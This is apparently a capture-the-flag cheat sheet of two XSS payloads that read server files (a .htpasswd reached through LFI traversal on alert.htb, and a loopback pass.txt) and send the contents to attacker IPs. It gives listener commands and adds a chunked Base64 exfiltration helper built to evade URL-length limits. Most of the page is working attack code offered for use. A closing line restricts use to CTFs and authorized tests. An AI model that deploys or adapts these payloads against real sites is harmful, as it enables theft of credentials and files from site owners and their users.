1. Steal File Content Using Inline XSS Script (HTML)

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.14.228/?data=" + encodeURIComponent(data));
  })
  .catch(error => console.error("Error fetching the messages:", error));
</script>

Explanation:

  • The script runs in the victim's browser on the alert.htb origin, so its fetch to messages.php is same-origin and the response body can be read. messages.php is assumed to have a file-read / local file inclusion (LFI) bug in its file parameter; the traversal path makes it return the .htpasswd of the statistics.alert.htb vhost.
  • The content is then sent to the attacker server (10.10.14.228) as the data query parameter of a second GET request, URL-encoded with encodeURIComponent so that newlines, '$', '/' and '+' survive the trip. That request is cross-origin, but it needs no CORS: the browser sends it regardless and only blocks reading the response, which the script never does.
  • Works wherever you can inject JS into a page on the target origin (reflected or stored XSS). The .catch only covers the first fetch; a failed callback request shows up as an unhandled rejection in the victim's console, not on your side.

How to use:

  • Inject this script into an XSS vulnerable parameter or stored XSS vector.
  • Make sure your attacker machine (10.10.14.228) is ready to receive GET requests and log the data parameter.
  • Example listeners to capture the data (nc prints one raw request and exits; http.server logs the request line, query string included, for every hit and keeps running):
nc -lvnp 80
# or
python3 -m http.server 80
  • The data parameter arrives percent-encoded; URL-decode it before reading the file.
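The payload above ships the whole file in a single GET. As an added example (not part of the original page), the following is a sturdier version of the exfiltration step that both payloads on this page share: it Base64-encodes arbitrary text (including characters btoa alone rejects), splits the result into numbered chunks so no single URL gets too long, percent-encodes each chunk correctly, and shows the reassembly the listener would do. The listener URL http://10.10.14.228/ and the id/seq/n parameter names are assumptions; run it in a browser console or Node 18+.

```javascript
// Added example, not from the original page: a sturdier exfiltration step for
// either XSS payload. Assumed listener URL; replace with your own box.
const ATTACKER = "http://10.10.14.228/";

// Base64-encode arbitrary text. btoa() alone throws on characters above
// U+00FF, so go through UTF-8 bytes first. Works in browsers and Node 18+.
function toBase64(text) {
  const bytes = new TextEncoder().encode(text);
  let bin = "";
  for (const b of bytes) bin += String.fromCharCode(b);
  return btoa(bin);
}

// Inverse of toBase64, as the attacker side would run it.
function fromBase64(b64) {
  const bin = atob(b64);
  const bytes = Uint8Array.from(bin, (c) => c.charCodeAt(0));
  return new TextDecoder().decode(bytes);
}

// Split the Base64 into fixed-size chunks, one GET per chunk, each tagged with
// a file id, sequence number and total count so the listener can reassemble.
// Keeps every URL far below the request-line limits of common web servers.
function buildExfilUrls(content, { id = "f1", chunkSize = 1500, base = ATTACKER } = {}) {
  const b64 = toBase64(content);
  const total = Math.max(1, Math.ceil(b64.length / chunkSize));
  const urls = [];
  for (let seq = 0; seq < total; seq++) {
    const chunk = b64.slice(seq * chunkSize, (seq + 1) * chunkSize);
    // encodeURIComponent, not encodeURI: encodeURI leaves '+', '/' and '='
    // alone, and servers decode a bare '+' in a query string as a space.
    const q = `id=${id}&seq=${seq}&n=${total}&data=${encodeURIComponent(chunk)}`;
    urls.push(base + "?" + q);
  }
  return urls;
}

// What the listener does with the collected requests: order by seq, join, decode.
function reassemble(urls) {
  const parts = urls
    .map((u) => new URL(u).searchParams)
    .sort((a, b) => Number(a.get("seq")) - Number(b.get("seq")))
    .map((p) => p.get("data"));
  return fromBase64(parts.join(""));
}

// Victim side: fire each GET in order. mode "no-cors" because we only need the
// request to leave the browser; the attacker's response is never read.
async function exfiltrate(content, opts) {
  for (const u of buildExfilUrls(content, opts)) {
    try { await fetch(u, { mode: "no-cors" }); } catch (_) { /* response unreadable, request still sent */ }
  }
}
```

In a payload, replace the inner fetch with `exfiltrate(data, { id: "htpasswd" })`. Chunks may arrive out of order on a busy listener, which is why each carries seq and n.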

2. External JS File to Steal File Content via XSS (JavaScript)

// Usage:
// Spawn python HTTP server on attacker box: python3 -m http.server 1212
// Inject in vulnerable page: <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script>

var url = "http://127.0.0.1/dir/pass.txt";   // Target file, as served by a web server on the victim host (loopback)
var attacker = "http://10.9.179.230:1212/steal_page_content_xss.js";   // Any URL on the attacker server; the query string lands in its access log

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        // Base64-encode the stolen content and send it to the attacker as the
        // data query parameter. encodeURIComponent (not encodeURI) is required:
        // encodeURI leaves '+' and '=' untouched, and a '+' in a query string
        // is read back as a space, which corrupts the Base64.
        fetch(attacker + "?data=" + encodeURIComponent(btoa(xhr.responseText)));
    }
};
xhr.open('GET', url, true);
xhr.send(null);

Explanation:

  • The victim's browser requests http://127.0.0.1/dir/pass.txt, i.e. a file served by a web server listening on the victim host's own loopback interface. The script can only read it if that address is the same origin as the XSS'd page (or the server sends a permissive Access-Control-Allow-Origin header); otherwise responseText is empty.
  • When the request completes (readyState DONE), the content is Base64-encoded with btoa so that newlines, binary bytes and query-breaking characters survive in a URL. btoa throws on characters above U+00FF; for non-Latin-1 text, encode to UTF-8 bytes first.
  • The encoded content is sent back by requesting the hosted script URL again with the data in the query string. python3 -m http.server ignores the query, serves the file and writes the full request line, query included, to its log.
  • Requires you to host this script on your attacker machine (10.9.179.230) with an HTTP server running on port 1212.

How to use:

  • Start HTTP server on attacker box:
python3 -m http.server 1212
  • Inject <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script> into an XSS vulnerable page.
  • Monitor requests on your attacker server to capture the Base64 encoded file contents in the URL.
  • Decode captured Base64 content:
echo "base64_encoded_string" | base64 -d > stolen_file.txt

Summary Notes:

  • These methods depend on the victim's browser being able to read the target file: through a server-side bug reachable on the XSS'd origin (the LFI-style file parameter in method 1) or a web server on the victim host answering on 127.0.0.1 (method 2).
  • Base64 encoding lets arbitrary file bytes travel in a GET query string; always percent-encode the result with encodeURIComponent, since a raw '+' in a query is decoded as a space. Very long URLs can be truncated or rejected by the receiving server, so split large files across several requests.
  • You must control the attacker server to catch the stolen data; with plain listeners like nc or http.server the data sits in the logged request line and still needs URL- and Base64-decoding.
  • Use only in CTF challenges, authorized penetration tests, or otherwise controlled environments.
  • Check the same-origin policy and CORS: the read of the target file must be same-origin with the XSS'd page or explicitly allowed by Access-Control-Allow-Origin, otherwise the fetch rejects or responseText is empty. Sending to the attacker server needs no CORS, since the response is never read.